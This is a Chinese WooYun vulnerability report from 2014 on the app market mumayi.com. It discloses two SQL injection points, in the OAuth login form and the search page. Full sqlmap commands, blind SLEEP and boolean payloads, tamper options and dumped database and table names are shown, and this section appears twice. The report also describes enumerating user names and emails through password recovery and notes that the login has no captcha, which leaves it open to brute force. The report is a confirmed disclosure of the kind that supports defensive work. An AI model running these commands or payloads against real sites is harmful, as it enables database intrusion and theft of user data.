当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087458

漏洞标题:木蚂蚁2处SQL注入以及另一处用户名、邮箱遍历问题

相关厂商:mumayi.com

漏洞作者: 玉林嘎

提交时间:2014-12-17 09:36

修复时间:2015-01-31 09:38

公开时间:2015-01-31 09:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-17: 细节已通知厂商并且等待厂商处理中
2014-12-17: 厂商已经确认,细节仅向厂商公开
2014-12-27: 细节向核心白帽子及相关领域专家公开
2015-01-06: 细节向普通白帽子公开
2015-01-16: 细节向实习白帽子公开
2015-01-31: 细节向公众公开

简要描述:

详细说明:

之前的洞都补上了,但是问题还是有还是很类似的。
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"

sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Place: POST
Parameter: usernm
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=http://hao.mumayi.cn/Homelogin/Callback&state=&scope=&display=&accept=Yep
---
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11


sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs

available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] mysql
[*] oauth
[*] performance_schema
[*] test
[*] uc
[*] uc_mumayi
[*] ucenter


还是涉及用户库其他其他重要库
http://s.mumayi.com/index.php?q=1&typeid=0 搜索网站 也存在注入(q参数存在注入)
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: q
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=1%' AND 2300=2300 AND '%'='&typeid=0
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
---
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11


sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs

available databases [1]:
[*] developer


sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper

[23:01:10] [INFO] retrieved: 
[23:01:11] [WARNING] reflective value(s) found and filtering out
98
[23:01:20] [INFO] retrieved: market_cloudbackup
[23:03:38] [INFO] retrieved: mumayi_abgut
[23:05:04] [INFO] retrieved: mumayi_acl
[23:05:46] [INFO] retrieved: mumayi_ad`speclist
[23:07:25] [INFO] retrieved: mumayi_adlist
[23:08:14] [INFO] retrieved: mumayi_admi`
[23:08:53] [INFO] retrieved: mumayi_admi@_log
[23:09:49] [INFO] retrieved: mumayi_adpage
[23:10:42] [INFO] retrieved: mumayi_adposition
[23:11:49] [INFO] retrieved: mumayi_adsoft
[23:12:33] [INFO] retrieved: mumayi_arctype
[23:13:48] [INFO] retrieved: mumayi_arcsype_baks
[23:15:42] [INFO] retrieved: mumayi_baikan_focus
[23:18:00] [INFO] retrieved: mumayi_bbs2013
[23:19:15] [INFO] retrieved: mumayi_channel
[23:20:44] [INFO] retrieved: mumayi_ciry
[23:22:24] [INFO] retrieved: mumayi_district
[23:24:01] [INFO] retrieved: mumayi_downchalnel_day
[23:27:18] [INFO] retrieved: mumayi_downchannel_month
[23:29:48] [INFO] retrieved: mumayi_d\wnch@hhel_year
[23:34:14] [INFO] retrieved: mumayi_download^Xpush
[23:36:48] [INFO] retrieved: mumayi_go@gle_arctPpe
[23:39:02] [INFO] retrieved: mumayi_google_list
[23:40:22] [INFO] retrieved: mumayi_google_soft
[23:41:08] [INFO] retrieved: mumayi_member
[23:42:00] [INFO] retrieved: mumayi_member_ac`
[23:42:47] [INFO] retrieved: mumayi_member_log
[23:43:26] [INFO] retrieved: mumayi_member_repource
[23:44:35] [INFO] retrieved: mumayi_member_roje
[23:45:21] [INFO] retrieved: mumayi_menu
[23:45:58] [INFO] retrieved: mumayi_m`niank
[23:46:58] [INFO] retrieved: mumayi_minisoft
[23:48:09] [INFO] retrieved: mumayi_mpk_extension
[23:49:44] [INFO] retrieved: mumayi_mpk_focus
[23:50:32] [INFO] retrieved: mumayi_mpk_phonebrand
[23:51:50] [INFO] retrieved: mumayi_mpk_phoneinfo
[23:52:37] [INFO] retrieved: mumayi_mpk_phoneinfo_temp
[23:53:38] [INFO] retrieved: mumayi_notfce
[23:54:25] [INFO] retrieved: mumayi_online
[23:55:16] [INFO] retrieved: mumayi_pc_drive
[23:56:39] [INFO] retrieved: mpmayi_pc@drive2
[23:58:18] [INFO] retrieved: mumayi_pc_eqtip@


太多了
还有一个小问题 上次有说过
http://u.mumayi.com/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱

QQ图片20141217000834.jpg


直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank

漏洞证明:

之前的洞都补上了,但是问题还是有还是很类似的。
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"

sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Place: POST
Parameter: usernm
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=http://hao.mumayi.cn/Homelogin/Callback&state=&scope=&display=&accept=Yep
---
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11


sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs

available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] mysql
[*] oauth
[*] performance_schema
[*] test
[*] uc
[*] uc_mumayi
[*] ucenter


还是涉及用户库其他其他重要库
http://s.mumayi.com/index.php?q=1&typeid=0 搜索网站 也存在注入(q参数存在注入)
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: q
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=1%' AND 2300=2300 AND '%'='&typeid=0
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
---
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11


sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs

available databases [1]:
[*] developer


sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper

[23:01:10] [INFO] retrieved: 
[23:01:11] [WARNING] reflective value(s) found and filtering out
98
[23:01:20] [INFO] retrieved: market_cloudbackup
[23:03:38] [INFO] retrieved: mumayi_abgut
[23:05:04] [INFO] retrieved: mumayi_acl
[23:05:46] [INFO] retrieved: mumayi_ad`speclist
[23:07:25] [INFO] retrieved: mumayi_adlist
[23:08:14] [INFO] retrieved: mumayi_admi`
[23:08:53] [INFO] retrieved: mumayi_admi@_log
[23:09:49] [INFO] retrieved: mumayi_adpage
[23:10:42] [INFO] retrieved: mumayi_adposition
[23:11:49] [INFO] retrieved: mumayi_adsoft
[23:12:33] [INFO] retrieved: mumayi_arctype
[23:13:48] [INFO] retrieved: mumayi_arcsype_baks
[23:15:42] [INFO] retrieved: mumayi_baikan_focus
[23:18:00] [INFO] retrieved: mumayi_bbs2013
[23:19:15] [INFO] retrieved: mumayi_channel
[23:20:44] [INFO] retrieved: mumayi_ciry
[23:22:24] [INFO] retrieved: mumayi_district
[23:24:01] [INFO] retrieved: mumayi_downchalnel_day
[23:27:18] [INFO] retrieved: mumayi_downchannel_month
[23:29:48] [INFO] retrieved: mumayi_d\wnch@hhel_year
[23:34:14] [INFO] retrieved: mumayi_download^Xpush
[23:36:48] [INFO] retrieved: mumayi_go@gle_arctPpe
[23:39:02] [INFO] retrieved: mumayi_google_list
[23:40:22] [INFO] retrieved: mumayi_google_soft
[23:41:08] [INFO] retrieved: mumayi_member
[23:42:00] [INFO] retrieved: mumayi_member_ac`
[23:42:47] [INFO] retrieved: mumayi_member_log
[23:43:26] [INFO] retrieved: mumayi_member_repource
[23:44:35] [INFO] retrieved: mumayi_member_roje
[23:45:21] [INFO] retrieved: mumayi_menu
[23:45:58] [INFO] retrieved: mumayi_m`niank
[23:46:58] [INFO] retrieved: mumayi_minisoft
[23:48:09] [INFO] retrieved: mumayi_mpk_extension
[23:49:44] [INFO] retrieved: mumayi_mpk_focus
[23:50:32] [INFO] retrieved: mumayi_mpk_phonebrand
[23:51:50] [INFO] retrieved: mumayi_mpk_phoneinfo
[23:52:37] [INFO] retrieved: mumayi_mpk_phoneinfo_temp
[23:53:38] [INFO] retrieved: mumayi_notfce
[23:54:25] [INFO] retrieved: mumayi_online
[23:55:16] [INFO] retrieved: mumayi_pc_drive
[23:56:39] [INFO] retrieved: mpmayi_pc@drive2
[23:58:18] [INFO] retrieved: mumayi_pc_eqtip@


太多了
还有一个小问题 上次有说过
http://u.mumayi.com/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱

QQ图片20141217000834.jpg


直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank

修复方案:

版权声明:转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-12-17 10:02

厂商回复:

感谢提醒,正在处理

最新状态:

2015-01-06: